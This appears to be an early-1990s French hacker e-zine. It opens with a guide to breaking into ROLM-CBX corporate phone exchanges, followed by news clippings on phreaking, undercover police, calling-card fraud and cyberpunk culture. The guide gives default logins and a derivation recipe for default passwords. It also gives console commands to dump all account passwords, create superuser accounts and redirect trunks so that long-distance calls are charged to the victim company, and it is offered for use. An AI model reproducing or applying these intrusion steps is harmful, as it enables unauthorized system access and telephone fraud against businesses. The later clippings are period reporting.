Utiliser l'interface de configuration interactive (ICI).. 1.40 Accder la liste des Trunk............................. 1.50 Accder la liste des Usagers........................... 1.60 Crer de nouveaux Acomptes............................... 1.70 Accder la liste du Hardware........................... 1.80 Accder la liste des Lignes Data & Setup............... 1.90 Conclusion............................................... 2.00 1.00 - Introduction - Salut les potes! Bienvenue dans ce guide des ROLM-CBX. Une partie de ce texte (principalement les mots de passe standards) provient de l'intro d'un T-file crit par Tracer. Il faut donner le crdit l o il est d. La raison qui m'a pouss crire ce texte? Je considre qu'il n'y avait pas encore eu un bon texte sur les ROLM-CBX, un long texte qui couvrirait vraiment l'ensemble du sujet. Alors, le texte qui suit peut tre considr comme une somme en la matire, dfaut de possder le manuel original. En esprant que vous le trouviez pratique et qu'il puisse vous donner un coup de main lors de votre prochaine incursion dans le "cyberspace"... 1.10 - Ce qu'est un CBX - CBX veut dire "Computerized Branch Exchange". En d'autres mots, c'est un PBX qui fonctionne partir d'un ordinateur. Habituellement, un CBX pourra contrler, au choix, un PBX local o pour les longues distances, ainsi que toute une varit de services, comme la messagerie vocale et le systme tlphonique de la compagnie l'interne. Le CBX peut aussi excuter toute une srie de commandes standard, comme les renvois d'appel, les dial-in et les dial-out. Un usage possible du CBX, par exemple, peut tre de le programmer afin qu'il effectue un renvoi d'appel vers un PBX longue-distance partir d'un dial out. En bref, les possibilits qu'offre un CBX tout bon hacker ne sont dfinies que par les limites de son imagination. 1.20 - Pntrer dans un ROLM-CBX - Quand vous entrez et que vous loggez sur un tel systme, voici la premire chose que vous apercevez en en-tte: ROLM CBX SITE ID: SEARS31332 RELEASE: 9004.4.20 BIND DATE: 19/DEC/88 COPYRIGHT (C) ROLM CORPORATION, 1987 ALL RIGHTS RESERVED - PROPERTY OF ROLM CORPORATION 03:34:55 ON MONDAY 6/22/1992 33 DEGREES C Lorsque le systme demandera le nom d'usager, entrez: ENG Maintenant, pour trouver le mot de passe par dfaut (standard), prenez le jour du mois de l'en-tte (22), ajoutez-y le numro de node (habituellement 1), plus le premier chiffre de la minute (ici 0). Dans le cas prsent, le total est 23. Utilisez le dernier chiffre de ce total (3) en le plaant comme le premier chiffre du mot de passe. Ajoutez maintenant les caractres suivants (WID), le numro du systme (ici 31332) et la premire lettre du mois courant (F). Dans le cas prsent, le mot de passe devrait ressembler : 3WID31332F Si cette technique arcane, mais authentique ne fonctionne pas pour vous, essayez le truc suivant. USERNAME: SU PASSWORD: SUPER ou USERNAME: SYSADMIN PASSWORD: ROLM ou ROLM-VLCBX ou SYSADMIN 1.30 - Utiliser le CBX - Le prompt pour un CBX va comme suit : %. La commande pour accder au Help est : ? Le Help devrait vous prsenter la liste des commandes suivantes : ABORT ACTIVATE ATTR BYE CANCEL CARD CDRSM CDT CHANGE CHG CLEAR CLR CMPCT CMSTS CNCL CNFG CONVERT COPY CPEG CTMON CTRA CTRTL CXCLR COPY CXCLR CXCON CXNET DACK DADD DAEVT DANS DBDMP DCAT DCF DCOM DDMA DDQ DDT DE DEACTIVATE DEFINE DELETE DEMOUNT DESUM DEX DFACK DFCOM DFEAT DFEVT DHTQ DHWS DIAG DIQ DISABLE DIWQ DKQ DML DMNT DMS DMTST DOWN DPATR DPMR DPMS DPPRI DPTR DQQ DRCT DREGS DSBLE DSQ DSST DSTAK DTCB DTDQ DWQ DX_TR ENABLE ENB ENBLE ETIO EX EXM EXN EXP EXPAND FINIT FORMAT FREER FSD GTOD HDBST HELP INSTALL KPFA LCT LIST LOAD LOGOFF LOGON LPEG LPKT LSCT LSL LST LTCB MNT MONITOR MOUNT MTRACE NEXT NSTAT PAGE PCNFG PDIO PFA PKTS PLIST PLTT PPFA PS PSH QAT QITM QTEST RCT RECEIVE RENAME REPLY RESTART RESTORE REVERSE RM RMOFF RPFA RSC RSCLK RSTOR RSTRT SAT SCAN SEND SETD SHOW SITM SOCON SOUNC SSAT START STATE STATUS STEST STOD STOP STRT STS TDCD TEST TKSTS TRTL TST TX UNLK UNLOCK UP VERIFY XDEF XMIT XPND Toutes ces commandes peuvent tre places partir du prompt %. Certaines pourrait, dpendant de la configuration du systme, tre hors d'usage, ou pourraient ne pas tre, tout simplement, disponibles, si vous n'tes pas en mode diagnostic (DIAG). Nous allons maintenant porter notre attention sur l'interface de configuration interactive (ICI), qui joue une part vitale dans le fonctionnement du CBX. 1.40 - Utiliser le ICI - Au prompt, entrer la commande CNFG. % CNFG Une en-tte va apparatre. Elle devrait ressembler ceci : CBX/9000 INTERACTIVE CONFIGURATION INTERFACE 15:14:32 ON MONDAY 6/22/1992 COMMAND: Ceci est le prompt principal. Si vous excutez la commande ? , vous allez obtenir la liste des fonctions suivantes : MODIFY, CREATE, LIST, CHECK, EXIT, DONE, RESET, REBUILD. En entrant une de ces commandes, vous allez obtenir le prompt suivant : NOUN: Vous pouvez alors entrer "?" ou "ALL", qui jouent le rle de "wildcard". Une liste des fonctions de configuration devrait apparatre : BUTTON_120 BUTTON_240 CDR_EXCLUDE CNFG_ERRORS CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP COS_FEAT DATA_ESS DATA_DEVICE DATA_GROUP DATA_LINE DATA_SUBMUX DLI ETS EXTEN FAC FAC_TYPE FAMILY FEAT_CODE FIRST_DIGIT HD_GROUP LEX LOGON_PROFILE MAP MEM_PARTS PARAM PICK POWER Q_TYPE ROUTE_LK RP RPD RPI RPS_120S_ON RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI SPEED T1D3 T1D3_GRP TRUNK TRUNK_GROUP VPC % CREATE LOGON_PROFILE ENTER NAME (1-12 CHAR): TEST ENTER PASSWORD: TEST RETYPE: TEST Ensuite, le systme va vous demander un nom de "famille". Si vous voulez obtenir un accs "SuperUsager", tapez "SYSTEM_ADMIN" Aprs, la machine devrait maintenant vous demander un "verbe". Les verbes sont les fonctions, ou commandes, que l'usager identifi dans la "famille" peut utiliser. Des flags en quelque sorte... Toujours pour votre futur acompte "SuperUsager", entrez "SU" pour avoir accs toutes les commandes. Pour obtenir une liste des usagers online au moment de votre appel, essayez ceci: % LIST CNFG_USERS NUMBER OF USERS MAX NUMBER OF USERS 3 5 PORT USER_NAME START_TIME HOW_LONG 17 SU 17:47:57 0:28:34 2 FIELD 18:16:03 0:0:28 3 MARYB 18:16:03 0:10:03 1.50 - Accder la liste des Trunks - En tout premier lieu, vous n'aviez bien sr appel sur ce systme que pour utiliser le PBX, et non pas pour vous promener sur le systme ou pour vous crer des acomptes. Eh bien, vous allez tre servi! Pour obtenir le listing des trunks qui donnent accs au PBX, vous faites cette simple commande, partir du prompt du ICI : COMMAND: LIST NOUN: TRUNK PAD: ALL Vous allez avoir toute une srie d'informations diverses, la plupart de celles-ci concernant les numros de nodes et les secteurs. Il vous faut en fait chercher, dans ce fouillis, une information semblable celle-ci : TRUNK IDENTIFICATION NAME ------------------------------ ---------------- DS RJ 2/11 352-0515 CO START END CHECKS PASS INTCEPT TIME TIME ACT FAC WORD EXTN ----- ----- - - ---- ------- DS 00:00 23:59 N N 1357 255 Prenez en note le numro d'identification du Trunk ainsi que son code, et vous avez maintenant un PBX qui n'attend que vos ordres... 1.60 - Accder la Liste des usagers - Maintenant, vous voulez trouver un acompte pour un de vos amis? Facile comme bonjour! Voici comment : A partir du ICI, faites : COMMAND: LIST NOUN: LOGON_PROFILE PAD: ALL Vous allez obtenir la liste complte des acomptes existants, avec les mots de passe et la liste des privilges pour chacun. 1.70 - Crer de nouveaux acomptes - % CREATE LOGON_PROFILE ENTER NAME (1-12 CHAR): ACCOUNT_NAME ENTER PASSWORD: PASSWORD RE-TYPE PASSWORD: PASSWORD VERB: ALL Cette srie de commandes vous permet de crer un acompte "Superusager" avec un accs TOTAL au systme. 1.80 - Accder la liste du Hardware - Vous tes probablement en train de vous demander: "Pourquoi est-ce que je devrais m'emmerder avec le matos du systme", right? Que diriez-vous d'avoir un dialout 9600 bauds? Cool, non? Peu importe, je vais vous montrer comment avoir accs au systme, mais vous allez devoir vous dbrouiller par vous-mme pour rediriger le modem du systme. Je n'ai pas le temps ni les connaissance ncessaires sur le ROLM-CBX pour vous le montrer avec certitude. Alors, voici pour avoir la liste du hardware... Vous entrez la commande suivante, toujours du ICI : % LIST DATA_DEVICE PAD: ALL Vous allez immdiatement obtenir la liste de tous les modems et de tous les terminaux branchs sur le systme. En utilisant la commande MODIFY, vous devriez normalement pouvoir vous dbrouiller pour changer le setting du modem pour qu'il puisse composer partir du numro de PBX que vous avez trouv plus tt. 1.90 - Accder aux lignes Data et Setup - Une des hypothses sur lesquelles j'ai travaill est la suivante: Comment peut-on rediriger une ligne de la compagnie vers un numro LD? J'ai trouv la rponse... % LIST TRUNK PAD: ALL Cette commande va vous donner la liste des trunks. Ensuite, vous faites : % MODIFY TRUNK NOUN: Ensuite, entrez toutes les options que vous dsirez. L'une de celles-ci sera un renvoi d,appel vers un autre numro, LD si possible. En fait, programmez ici votre numro de BBS LD ou de communication vocale, de faon ce que la connexion soit toujours automatique. Votre appel vers ce numro sera dsormais gratuit... 2.00 - Conclusion - Ceci tait mon premier, et probablement mon dernier, texte sur le phreaking pur et dur. Alors, amusez-vous, et surtout rappelez-vous: si vous ne russissez pas du premier coup... essayez encore. Vous pourrez toujours cracker un systme si vous y mettez assez d'efforts. Si vous avez un problme, une suggestion, ou un beau petit truc me communiquer sur les ROLM/CBX, appelez mon board : The Dialup 514-XXX-XXXX (dsol, vous devrez demander autour de vous pour le numro -Blitz) 1200 to 14.4k v32/bis NUP: CYBERNETIC LSD UPI East Coast Site NPC Site Ou appelez ma VMB (Sujet changement) 1-800-521-2070 *168 (Si vous n'entendez pas du reggae ou un beat d'enfer, ce n'est pas la mienne) Et souvenez-vous: Les Fonecos ont ANI et vont, si elles le peuvent, l'utiliser pour vous botter le cul jusqu'en prison! Vous allez vous retrouver sur la paille humide des cachots tellement vite que vous ne saurez jamais ce qui s'est pass! Paix et Anarchie! Greetings: Mechanix (pour m'avoir introduit aux CBX), Telephatic Slayer, The Lost Avenger, Arch Bishop, Ratpack (fine AE system you got), G0DMOTHER, Rock Steady, The Darkman (O que tu sois. Je sais, mais...), Atreid Bevatron et toute la gang de NPC, Tracer (pour son fichier original sur les CBX), et tous ceux que j'aurais pu oublier... Grunts: Avis tous les NARCS qui lisent ceci: o croyez-vous que a vous conduit, tous vos enfantillages? Au nom du ciel, essayez de penser l'impact de vos petites vendettas personnelles contre les membres de la communaut H/P. Vous croyez que vous tes un dur parce que vous avez russi faire draper ce pirate-ci ou celui- l? Comment vous sentiriez-vous si quelqu'un vous traitait de la sorte? Probablement ben mal... Nous devons travailler en quipe, et ne pas partir de guerre les uns contre les autres. Silicon Phreaker / UPI. Word Up. [Traduction: Blitzkreig] POUR MIEUX VOUS SERVIR, NOUS PROCEDONS A UNE AUGMENTATION READ THE NEWS, DON'T BELIEVE THE HYPE L'actualit dans les mdias par -=ThE PoSSe=- Leeched from LA PRESSE - Le samedi 13 fvrier 1993 DIEU REOIT-IL DES FAX? Associated Press -Jrusalem- Des centaines de personnes ont envoy par fax des messages Dieu par le biais d'une compagnie de tlphone isralienne, en dpit des avertissements d'un rabbin pour qui l'envoi de messages ne remplace pas la prire. "Nous avons reu entre 100 et 200 demandes par jour pour placer des messages dans le Mur des Lamentations" depuis l'entre en vigueur de ce service, prcise un porte-parole de la compagnie nationale. Le rabbin Yehuda Getz, responsable du Mur des Lamentations, a averti que les messages par fax ne dispensaient pas les fidles de prier. Les messages sont envoys sur un numro de fax Jrusalem o un employ de la compagnie les collecte, les apporte chaque jour au Mur des Lamentations et les place dans les fissures. La plupart proviennent de pays trangers. (Le numro, payant, est le suivant: 972-2-612222) -30- [Blitz- En passant, je me suis renseign et le service est gratuit. Vous ne payez que le LD... et encore. Une question, cependant: si j'utilise un PBX HACK ou un numro de carte d'appel VOLE pour demander une faveur Dieu, est-ce que je vais me ramasser en ENFER? J'angoisse, l!] Leeched from TNE NEW YORK TIMES, 26 janvier 93 GOING UNDERCOVER IN THE COMPUTER UNDERWORLD Law-Enforcement Officiers Quietly Tap Into the Illegal Activities of Cyberspace by Ralph Blumenthal He patrols the back alleys of cyberspace at the edge of the electronic frontier. Traveling on beams of electrons, he is invisible, formless - the ultimate undercover agent. He's "Phrackr Trakr" of the High-Tech Crime Network. But don't look for him in comic books or the video store. He's real. His beat takes in the thousands of computer bulletin boards where anyone with a computer, a modem and a phone can dial up and exchange information, or even start a new bulletin board. Usually, the subject is as innocuous as a computer game program, a receipe or pet grooming. But increasingly, the authorities say, the bulletin boards have become underground marketplaces for stolen telephone access codes and credit card numbers, along with child pornography and other contraband. Now, law-enforcement agencies have stepped up counterattacks, including computer-based stings. That's the passion of Phrackr Trakr, (pronounced FRACK-er TRACK-er), an organized-crime investigator, founder of a network of police computer buffs that now spans 28 states, and self-proclaimed scourge of "hackers" who break into computer networks, "phreakers" who steal telephone services, and "phrackers," who are a combinaison of both. In his newsletter called "FBI" (Find um, Bust um, Incarcerate um), he warned: "Every move you make, Every breath you take, We'll be watching you." Brazenly, he uploaded the taunt onto bulletin boards in June in an effort, as he wrote, to sow "anarchy, chaos, mistrust and fear" in the "phracker community." Boyish, with closely cropped hair and a penchant for suspenders and rakish double-breasted suits, the 36-year-old investigator works in the organized crime, racketeering and narcotics bureau of a large law-enforcement agency in the East. Like other undercover agents whose success and safety hinge on an ability to blend in with their targets even though they chafe at the anonymity of their work, he was eager to draw attention to his operations, provided his identity was withheld. An Electronic Wall ~~~~~~~~~~~~~~~~~~ While infiltrating electronic bulletin boards, and investigating computer crime is part of his job, he said, the High-Tech Crime Network that he organized last year to educate other officiers around the country is his own project, for which he has spent some $4,000 of his own money on computer equipement and phone bills. Though his investigations have yet to yield arrests, he said he is studying nine boards and building cases with officiers in three other states. "It takes time," he said. "You don't just buy one thing and arrest them. They'd know you were a cop. You buy things over time and make several arrests." While the Secret Service and the Federal Bureau of Investigation are also conducting investigations, he said, local law enforcement also has jurisdiction. Others corroborated his account. His information jibes, furthermore, with well-documented efforts by law-enforcement agencies nationwide to penetrate the perhaps 10 percent of the nation's estimated 30,000 electronic bulletin boards where computer criminals traffic in stolen information, child pornography, poison recipes and bomb-making instructions. "I want to make cops aware of high-tech crime," he said as he typed at a home computer recently reading his electronic mail from other officiers and leaving messages on bulletin boards that offered stolen credit card numbers and telephone calling codes. These were not pranks of teen-age computer whizzes, he said, "This is an organized criminal activity." "The victims are everybody," he said. "We all end up paying for it." Richard Petillo, manager of corporate security for AT&T, said such fraud now costs the industry, and thereby customers, an estimated $2 billion a year and continues to grow. "It's an epidemic, let's face it," he said. "Criminals are constantly working at ways to get around our controls. We liken it to a chess game." Bruce Sterling, a chronicler of the computer wars and author of "The Hacker Crackdown" (Bantam, 1992), concluded that while mischievous intrusions into computer networks were declining, "electronic fraud, especially telecommunications crime, is growing by leaps and bounds." This despite a crackdown by several agencies around the nation in 1990 (Operation Sun-Devil) that resulted in the seizure of some 40 computers and 23,000 floppy disks. Threat to Phone Companies ~~~~~~~~~~~~~~~~~~~~~~~~~ To telecommunications giants like AT&T, M.C.I. and Sprint, the primary fraud is theft of long-distance calling-card numbers. But they have the technology to detect sudden changes in customer calling patterns and can invalidate a card within hours. More difficult to detect are break-ins to a company's phone system - called a private branch exchange, or PBX. These thefts can afford free outside calling at the company's expense and can escape notice until the bill arrives. Among recent victims were the financially struggling New York Post, which suffered a $40,000 loss. Toward the end of a month, as the likelihood of their detection rises, "phreakers" often post PBX access codes on electronic bulletin boards, allowing wider exploitation and muddying the trail for investigators. The techniques for such electronic break-ins are widely disseminated on the bulletin boards. In addition, many experts say, the more secretive boards have become forums for pedophiles and other sexual predators who also inhabit cyberspace, that unfixable geography where disembodied strangers known only by their pseudonyms, or "handles," chat by computer and phone lines. Pornography, even moving pictures from overseas, are stored as files that can be dowloaded by minors into home computers at will. Chief Alfred O. Olsen of the Warwick Township Police Department in Litiz, Pa., who has worked with the police high-tech crime group and its founder, said in a recent report that he became aware of the nefarious uses of some bulletin boards as a result of a rape case in which the suspect met victims through a computer bulletin board. To get onto a bulletin board, a computer user needs only a communications program like Crosstalk and a modem that will send and receive signals over the phone line. Each board has its own phone number and is usually maintained by its originator, a system operator who sets the rules for access and coordinate the message traffic. Each board commonly offers the phone numbers of many other boards, as well as programs for starting yet other boards. But so-called underground boards offering illicit services require secret passwords, usually granted only to those who attend face-to-face meetings intended to weed out the police. The Limits of Expression ~~~~~~~~~~~~~~~~~~~~~~~~ Computer civil-libertarians like the Electronic Frontier Foundation counter that the police typically have difficulty differentiating between criminal schemes and constitutionaly protected free speech. But Phrackr Trakr said he understood the distinction. "If you want to write how to kill your parents, that's O.K.," he said, citing a bulletin board "phile" on how to dispose of a murdered parent's body. "But selling credit cards is something else." Learning the idioms was the first step in infiltrating a bulletin board system, he said. He used a software program on an IBM clone and a telephone modem to log onto one of several clandestine boards; he did this by using false identification and access passwords he had acquired by satisfying a series of questions testing his authenticity. He was scanning the messages when the systems operator who policed the board broke in:"What's up need any help?" "Yo dude," he typed out, "looking fer ATT's got any?" The operator provided the handle, or nickname, of someone who might have credit-card calling numbers. Phrackr Trakr left a message for him and addressed the operator. "Thanx for the codez," he typed, adding:"You only one getting any." If future transactions proved rewarding, he said, he would try to lure the supplier to a face-to-face meeting where he could be arrested by local authorities on other charges, safe-guarding the confidentiality of the undercover exchange. A Hacker's Attitude ~~~~~~~~~~~~~~~~~~~ He rummaged through other boards, finding files on how to turn household chemicals into deadly poisons, how to build an "Assassin Box" to send a supposedly lethal power surge through a telephone line, and how to use a tone dialer to make free calls from certain coins telephones. Then it was time to log onto his own bulletin board - protected by his own high-security measures - to check the mail from fellow members of the Hi-Tech Crime Network. Tim left a message saying he had found that a bulletin board he was investigating concealed an even more interesting underground board. "I'm in the process of getting elite access now," he wrote. "Hope it works." But, Tim wanted to know, what if he was asked to provide card numbers in return? "Always put them on the defensive," counseled Phrackr Trakr. "Let them know you're interested but come across as being cautious. They will understand that. Upload some of the files you got from this board and that should give you some credibility. Have an attitude. Most hackers/phreakers do." - 30 - Damn. It seems that this guy has an orgasm everytime he logs on an underground board. .Subhuman. Leeched from LE JOURNAL BELL vol. 29 #4 - 1er fvrier 93 Fraudes interurbaines FACTURES SALEES AU SAGUENAY-LAC-ST-JEAN En janvier dernier, des clients de la rgion Chicoutimi- Jonquire ont eu toute une surprise en recevant leur relev de compte mensuel. Pour certains la facture s'levait plus de 5 000 $ en frais d'interurbain: des appels destination de tous les coins du monde qu'ils n'avaient vraisemblablement jamais effectus. "Ces gens ont t victimes d'un fraudeur particulirement fut qui svit depuis environ six mois et dont on vient de retrouver la trace", rapporte Jacques Desjardins, chef divisionnaire adjoint - sret. L'homme, qui opre partir de New-York, appelle systmatiquement tous les numros de tlphone d'une rgion. Il se fait passer pour un employ du Bell et, sous un faux prtexte, s'enquiert dans un trs bon franais du numro d'identification personnel (NIP) qui apparat sur la carte d'appel de ses interlocuteurs. Il revend ensuite cette information aux tats-unis ou en Europe pour 200, 300 $ et plus. Il serait, lui seul, responsable pour environ 500 000 $ d'appels interurbains frauduleux! "J'insiste sur le fait que JAMAIS un employ de Bell, autre que le tlphoniste dans le cadre de son travail, ne demande le NIP un client", prvient Melody Sguin, chef divisionnaire-adjoint - sret. "Le NIP est un numro confidentiel; les gens ne doivent le divulguer sous aucun prtexte", renchrit Jacques Desjardins. La fraude interurbaine est un flau contre lequel il est difficile de se prmunir. Les membres de la Sret de Bell tiennent rappeler que tous les intervenants, qu'ils soient des utilisateurs ou des compagnies de tlphone, doivent faire preuve de vigilance. ------- Quelques astuces pour djouer les fraudeurs  Ne divulguez jamais votre NIP personne d'autre que le tlphoniste de l'interurbain dans le cadre d'un appel.  Soyez discrets. Ne criez pas votre NIP dans le tlphone et cachez le clavier lorsque vous le composez.  Dans la mesure du possible, utilisez les tlphones publics Millnium. Ces appareils sont pourvus d'un lecteur magntique l'intrieur duquel vous glissez votre carte d'appel. Ainsi, personne ne peut voir ou entendre votre NIP.  Surveillez vos relevs de compte. Particulirement dans les grandes entreprises. Les compagnies de tlphone amricaines ne confirment pas ncessairement les appels facturs un troisime numro. Certains fraudeurs facturent leurs appels interurbains au numro d'une grande entreprise en tablant sur le fait qu'ils se trouveront noys dans le flot des appels quotidiens. - 30 - [Blitz- C'est insultant! Mmes les twits du Bell croient qu'il n'y a que des Newyorkais qui peuvent frauder! Un pirate du Saguenay aurait trs bien pu faire la mme chose, en passant par un PBX situ New-York, avant d'appeler avec son numro de carte d'appel vol. C'est probablement se qui s'est produit d'ailleurs, sauf que les zoufs de la CHURETE du BELLE croient tenir leur fraudeur... fat chance...] Leeched from GB-Justice - 23/02/1993 Londres, 23 fv. (AFP) - Un jeune passionn d'informatique qui a sem le chaos pendant au moins deux ans dans des systmes informatiques de la CEE, comparat devant la justice Londres, accus notamment d'accs non-autoris du matriel informatique et de complot pour obtenir malhonntement des services de tlcommunications. Paul Bedworth, 19 ans, a t arrt il y a deux ans lorsqu'une de ses cibles, l'Universit de Leeds, excde par ses piratages, est remonte jusqu' lui. Le jeune homme avait acquis une telle matrise dans sa partie qu'il tait capable de changer les mots de code des systmes qu'il piratait, empchant ainsi leurs utilisateurs autoriss d'y avoir accs. L'Universit de Leeds est ainsi reste prive de ses ordinateurs jusqu' six heures dans une mme journe, en 1991, du fait des activits du jeune homme, qui oprait partir d'une simple console 200 livres (300 dollars) reue en cadeau 14 ans. Pendant ces sessions, selon l'accusation, Paul Bedworth se connectait des systmes au Luxembourg, notamment ceux de la CEE, en Allemagne, en France, n'pargnant ni l'ordinateur du quotidien Financial Times, ni des associations mdicales europennes, ni la Lloyds Bank - sans toutefois en profiter pour effectuer des oprations bancaires frauduleuses. Le jeune homme, qui nie les charges retenues contre lui, a galement t accus d'avoir pirat des lignes tlphoniques, pour assouvir moindre frais sa passion informatique. "Priv de tlphone" par sa mre, il avait tir une ligne, qui passait sous le tapis de sa chambre, et s'tait connect au terminal des Tlcommunications britanniques de telle faon que d'autres abonns, en particulier l'Universit de Manchester, payaient le gros de ses factures, sa mre n'tant redevable que d'une communication au tarif local. Paul Bedworth, qui avait entre 15 et 17 ans l'poque des faits, tudie actuellement l'intelligence artificielle de l'Universit d'Edimbourg. [Transcriber: Subhuman] Leeched from OMNI VOL.15 NO.2 NOVEMBER 1992 SECRETS OF THE CYBERCULTURE COMPUTER COWBOYS ROAM THE TECHNO-UNDERGROUND SEEKING INFORMATION - OR JUST WREAKING HAVOC ARTICLE BY A. J. S. RAYL Something's happening here. What it is ain't exactly clear. There's apunk with a computer over there, tellin'me I got to beware.... It's a time-warp scene in some weird science-fiction story as I head down Telegraph Avenue just outside the Berkeley campus. The smell of patchouli wafts through the air, overwhelming other scents of burnings incense. The driving beat of the Doors' "Break on Through" pusates from a record store - a fitting soundtrack to the movie surrounding me. Sidewalk merchants are hawking everything from tie-dyed T-shirts to turquoise jewelry. Me? I'm on a mission -to meet my connectionin the counterculture. It seems conspucuously like the Sixties. But familiar sights, sounds, and vibes aside, things have changed. After all, this is the Nineties. Abbie Hoffman is dead. And no one is attempting to levitate the Pentagon anymore. But if you thought the revolution was over, think again - and read on. These days, a new breed of younf politicized radicals, known as cyberpunks, roam a techno-underground. Inspired and fueled in part by ideas emerging from science-fiction literature, these cyberpunks are computer cowboys riding the trails of cyberspace - a nether world of bitstreams and databases inside computer networks - circumventing software barriers in search of information and services or sometimes just to wreak a little mischievous havoc. They've got the equipment and, they say, the technical knowhow to slip into virtually any computer system and affect changes with global ramifications. With the tap of a key, they claim, they could effectively cripple the economy or shut down communications systems the world over. If that is true, then cyberpunks hold the potential for becoming the most powerful coundtercultural force ever. The government has taken them seriously. It has launched at least two major operations, one in 1990 called Operation Sundevil, to quash the movement. The problem: The consensus in the computer community is these government agents know considerably less about the technology than the computer experts and the cyberpunks, a charge government officials deny. As Secret Service Special Agent John F. Lewis put it, "There are some very talented infividuals who are unfortunately misdirecting their energies. But to say they're leaps and bounds ahead of law enforcement personnel isn't true." Still, so far their efforts, have seemed dubious at best, serving more to fan the flames of the socio-political fire now raging over the control of and individual rights in the electronic frontier. I duck into a coffeehouse and manage, with relative ease, to spot my connection - one of the hackers for whom the word cyberpunk was created. he's tall and slender, wearing black jeans and sporting a pair of John Lennon specs. He has a boyish, almost baby, face, which belies the brain power it so handsomely covers. His eyes are intese, at times piercing. Overall, he appears every bit the intellectual anarchist for which the Berkeley scene is perfect camouflage. He's known in the techno- underground as Michael Synergy. Twelve years ago, Synergy was your basic computer nerd. He spent his time exploring cyberspace, staging his own quiet protests by going where he wanted, when he wanted. Synergy became so adept at infiltrating systems that he's become a legend. Todat he remains something of an icon in the techno-underground. Synergy evolved - as did cyberpunk - from the late Seventies'hacker community. "There ware a lot of us playing with the phone systems, and then slowly we began to find our ways into other networks," says Synergy, as he takes a sip of tea, adjusts his Lennon specs, and leans back in his chair. "My whole reason for breaking into systems way back then was to become educated. At that time, there wasn't a C-compiler on microcomputers, so I broke into Bell Labs just to learn C." Most hackers used their talents then, Synergy says, simply to learn. For the most part, the original hacker crew was apolitical - more interedted in the machines than in the politics. As they began traversing software barriers into the secured systems of major corporations, governement, and military-industrial complexex, however, that began to change. They gleaned a lot of inside, top-secret information on just about everything, including covert military operations. At the age of 14, Synergy, now in his late twenties, managed to slip into a supposedly secure top-secret computer network run by the intelligence community and the Department of Defense. The DOD took him out of cyber circulation and brought him into their circle. He worked for nearly three years conducting "penetration testing and security design" for the national Security Agency, Secret Service, and FBI, as well as the DOD. Consequently, Synergy became politicized. "it used to be really hard to find things out, but nowadays systems are so well networked together, if you know which machine to talk to in the intelligence community, it's fairly simple to break in," he says. "The work I did for different government agencies gave me an inside view, and that strengthened my opinions. It made me very political and very antigovernment. Once you have access to the system, you begin to clearly see the bars of the prison we live in." While Synergy was being politicized, writers on the science-fiction front were at work writing about such youthful electronic frontier outlaws. They projected them into dark, desolate, not-so-distant futres where technology both rules and runs amok, and set them in adventures in cyberspace where data serves as the landscape and territories are traversed mathematically, not geographically or physically. The term cyberpunk was brainstormed back in 1980 by Bruce Bethkeas the title for a short story he'd written about a computer-hacker gang - bored suburban kids out to raise hell. Bethke had been hanging around, playing keyboards on the periphery of the punk New Wave music scene while working for Radio Shack. "I wanted a word that grokked these punk attitudes and the technologies," he says. The story, which was published in the magazine Amazing in 1983, remained obscure - but the title took seed, first in the science-fiction community and then in the media at large. The success of William Gibson's first novel, Neuromancer, published in 1984, actually launched the cyberpunk on the map of the collective public consciousness. Set in a future urban dystopia, the novel centers on Case, a software cowboy for hire. Burned by Japanese microbionics experts who bonded tiny sacs of a wartime Russian mycotoxin to his artery walls, Case is suffering a slow death. He finds a man who can cure him, provided, of course, that he is able to penetrate a highly secured computer system and acquire the key information. In order to get inside the various systems, Case links his brain directly to the computer, or, in the terminology of the novel, "jacks in to the net." While the word cyberpunk never appears in the Neuromancer text, it was the catch phrase that reviewers used to define his book ans the new genre that suddenly seemed to be everywhere. Other cyberpunk-oriented works by such writers as Bruce Sterling (Schismatrix, Islands in the Net), Pat cadigan (Mindplayers, Pretty Boy Crossover), and John Shirley (Eclipse coroca) captured SF fans. Gibson, whose own early inflences were such "subversive" rock-'n'- rollers as Lou Reed/Velvet Underground and Steely Dan, had been watching the puck-music scene with a certain enthusiasm. In fact, he says, the rebelliousness of puck served as the inspiration, and his own boredom as the fuel that motivated him to begin work on Neuromancer and numerous other cyberpunk short storied (many first published in Omni). Gibson wrote two more cyberpunk-oriented novels - 'Count Zero' and 'Mona Lisa Overdrive' - and garnered acclaim as the godfather of cyberpunk. It's not a title, however, that he's assumed. "It's really just an accident in history," says the author, whose roots go back to the counterculture of the Sixties. Gibson actually knew very little about computers and high technology: He pounded out his cyberpunk works on a 1938 manual typewriter while listening to early Bruce Springsteen albums. "I didn't set out to start a movement, but for whatever reason, "he says, "those books of mine have become a rallying point." Co-cyber writer Sterling agrees that Gison was in the right place at the right time. "to some extent, people always credit the messengers," says Sterling, whose first nonfiction work, Hacker Crackdown, about the government's efforts to stop hackers, was published this fall. "We write books for a purpose - not just to be cute. Science fiction is about making up weird ideas and throwing them out there. And now all that stuff we were writing about 'is' out there - loose in the world." What happened when cyberpunk science fiction hit was a case of life imitating art. "Suddenly, the concept of cyberspace took hold and inspired the real hackers, and they began to redirect their efforts in the technical arena. It gave us a vision of technology's potential," says Synergy. "most ocmputer enthusiasts and a lot of the hackers are very thechnical, but not very intouch with the world at large. The difference is cyberpunks are very technologically capable but at the same time very worldly, connected to reality and what's going on in the culture." In ssence, the cyberpunks are to the hackers as yippied were to hippied - political, savvy, worldly versions of the alternative culture. They don't hack out in places, but in cyberspaces, communing, often anonymously, on computer bulletin-board systems or through "zines" - electronic magazines. While there are several hardcopy magazines devoted to things cyberpunk - the most popular being 'Mondo 2000' - cyberpunks do their real business in the net. "Listen to these titles - Anarchy 'N' Explosives, Bootlegger, Clut of the Dead Cow Files, Freaker's Bureau International' National Security Anarchists, Phuck-in Phield Phreakers, Rebel's Riting Guild, and TAP (Technological Advancement Party) Online, which is actually the resurrection of Abbie Hoffman's old magazine," says Sterling, leafind through a compilation of computer sources recently sent to him. The vast majority of bulletin-board systems and zines, however, are legal and aboveboard. In 1985, 'the Whole Earth Review' created the 'Whole Earth Lectronic Link, known as the WELL. "While this electronic medium existed, there was no publicly available community," says founder Howard Rheingold. "The purpose was to create a public utility to enable people to build a community and do business online." Current WELL members include communications pioneers as well as SF authors like Sterling, and, of course, cyberpunks. Such above-ground efforts signify that cyberpunk is merging in pop culture, assuming meaning as a lifestyle, a way of thinking and, hence, a movement whose numbers - at least in terms of subscribers to the mindset - are beginning to grow. Central to the cyberpunk viewpoint is the belief that governments - nation states - are giving way to multinational corporations - 